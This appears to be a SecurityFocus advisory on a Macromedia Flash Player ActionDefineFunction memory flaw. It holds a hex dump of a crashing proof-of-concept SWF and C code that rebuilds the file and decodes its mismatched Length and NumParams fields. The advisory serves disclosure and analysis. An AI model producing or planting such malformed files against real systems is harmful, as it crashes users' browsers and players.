Macromedia Flash ActionDefineFunction Memory Access Vulnerability

The following proof of concept is available, shown as a tag-by-tag dump of the SWF body (each dump starts with the tag's 2-byte RECORDHEADER; the SWF file header is not included):

<swf>

----- [SetBackgroundColor] -----
TagID: 9 (size: 3, short tag)
- dump ->:
\x43\x02\xff\x00\x00

----- [DoAction] -----
TagID: 12 (size: 60, short tag)
- dump ->:
\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

----- [ShowFrame] -----
TagID: 1 (size: 0, short tag)
- dump ->:
\x40\x00

----- [End] -----
TagID: 0 (size: 0, short tag)
- dump ->:
\x00\x00

</swf>

The following proof of concept (df.swf) provided by Karma <karma@DesignFolks.com.au> will determine if a vulnerable Flash Player is installed. If the Flash Player is vulnerable, opening the file will crash the browser. Otherwise a yellow image will be displayed.

The 'flash_dos_poc.c' proof of concept exploit by BassReFLeX creates a SWF file that triggers this issue and crashes a vulnerable Flash Player.
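The tag dump above, rebuilt into a complete SWF and decoded, as an added example that is neither Karma's df.swf nor BassReFLeX's flash_dos_poc.c. The tag bodies are copied byte for byte from the dump; everything the dump does not contain (SWF version 6, a 550x400 stage, 12 fps, one frame, the output file name) is this example's assumption. The decoder walks the ActionDefineFunction record the way a player would and reports what the bytes declare against what they actually supply: a record Length of 8 that the function name alone exceeds, and NumParams = 64 with only five parameter names present.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Tag bodies copied from the dump above (the 2-byte RECORDHEADERs are
 * regenerated by put_tag below). */
static const uint8_t BG_BODY[] = { 0xff, 0x00, 0x00 };     /* background RGB = red */
static const uint8_t DOACTION_BODY[] = {
    0x9b, 0x08, 0x00,                       /* ActionDefineFunction (0x9B), Length = 8 */
    'A','A','A','A','A','A','A','A', 0x00,  /* FunctionName (9 bytes: already > Length) */
    0x40, 0x00,                             /* NumParams = 0x0040 = 64 */
    'B','B','B','B','B','B','B','B', 0x00,  /* ...but only five parameter names follow */
    'C','C','C','C','C','C','C','C', 0x00,
    'D','D','D','D','D','D','D','D', 0x00,
    'E','E','E','E','E','E','E','E', 0x00,
    'F','F','F','F','F','F','F','F', 0x00,
    0x00                                    /* ActionEnd terminating the DoAction */
};

/* Short-form RECORDHEADER: UI16 = (TagCode << 6) | Length, Length < 63. */
static size_t put_tag(uint8_t *out, uint16_t code, const uint8_t *body, size_t len)
{
    uint16_t hdr = (uint16_t)((code << 6) | len);
    out[0] = (uint8_t)(hdr & 0xff);
    out[1] = (uint8_t)(hdr >> 8);
    if (len) memcpy(out + 2, body, len);
    return 2 + len;
}

/* Writes an uncompressed SWF to buf and returns its size (0 if buf is too small).
 * Header values are this example's assumptions, not taken from the page:
 * version 6, a 550x400 stage (RECT pre-encoded below), 12 fps, one frame. */
size_t build_swf(uint8_t *buf, size_t cap)
{
    static const uint8_t rect_550x400[] = { 0x78,0x00,0x05,0x5f,0x00,0x00,0x0f,0xa0,0x00 };
    size_t n;
    if (cap < 128) return 0;
    memcpy(buf, "FWS", 3);
    buf[3] = 6;                                   /* SWF version */
    n = 8;                                        /* bytes 4..7: FileLength, patched below */
    memcpy(buf + n, rect_550x400, sizeof rect_550x400); n += sizeof rect_550x400;
    buf[n++] = 0x00; buf[n++] = 0x0c;             /* FrameRate 12.0 as 8.8 fixed point */
    buf[n++] = 0x01; buf[n++] = 0x00;             /* FrameCount 1 */
    n += put_tag(buf + n, 9,  BG_BODY, sizeof BG_BODY);             /* SetBackgroundColor */
    n += put_tag(buf + n, 12, DOACTION_BODY, sizeof DOACTION_BODY); /* DoAction */
    n += put_tag(buf + n, 1,  NULL, 0);                             /* ShowFrame */
    n += put_tag(buf + n, 0,  NULL, 0);                             /* End */
    buf[4] = (uint8_t)n; buf[5] = (uint8_t)(n >> 8);
    buf[6] = (uint8_t)(n >> 16); buf[7] = (uint8_t)(n >> 24);
    return n;
}

struct define_function {
    uint16_t record_len;    /* Length field of the action record */
    uint16_t num_params;    /* NumParams as declared */
    size_t   names_present; /* non-empty parameter names actually present in the body */
};

/* Walks an ActionDefineFunction record the way a parser would, stopping when the
 * data runs out or an empty string is hit, and reports the declared vs. present
 * parameter counts. Returns -1 if the body is not an ActionDefineFunction. */
int decode_define_function(const uint8_t *p, size_t len, struct define_function *df)
{
    size_t i = 3;
    if (len < 3 || p[0] != 0x9b) return -1;
    df->record_len = (uint16_t)(p[1] | (p[2] << 8));
    while (i < len && p[i]) i++;                  /* skip FunctionName */
    if (i + 3 > len) return -1;                   /* need its NUL plus UI16 NumParams */
    i++;
    df->num_params = (uint16_t)(p[i] | (p[i + 1] << 8));
    i += 2;
    df->names_present = 0;
    while (df->names_present < df->num_params) {
        size_t start = i;
        while (i < len && p[i]) i++;
        if (i >= len || i == start) break;        /* out of data, or empty string */
        i++;
        df->names_present++;
    }
    return 0;
}

/* Convenience: decode the DoAction body from the page. */
int decode_page_doaction(struct define_function *df)
{
    return decode_define_function(DOACTION_BODY, sizeof DOACTION_BODY, df);
}

int main(void)
{
    uint8_t buf[128];
    struct define_function df;
    size_t n = build_swf(buf, sizeof buf);
    FILE *f = fopen("rebuilt_poc.swf", "wb");     /* output name is this example's choice */
    if (f) { fwrite(buf, 1, n, f); fclose(f); }
    decode_page_doaction(&df);
    printf("wrote %zu bytes; record Length=%u, NumParams=%u, names present=%zu\n",
           n, df.record_len, df.num_params, df.names_present);
    return 0;
}
```

The rebuilt file is 92 bytes: a 21-byte header followed by the four tags exactly as dumped, so the RECORDHEADER bytes at the start of each dump (\x43\x02, \x3c\x03, \x40\x00, \x00\x00) reappear at offsets 21, 26, 88 and 90. The decoder is the check a practitioner wants before opening such a file in a player: a parser that trusts NumParams will try to read 59 parameter names that are not there, and one that trusts the record Length of 8 will mis-locate the end of the record.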

Copyright 2010, SecurityFocus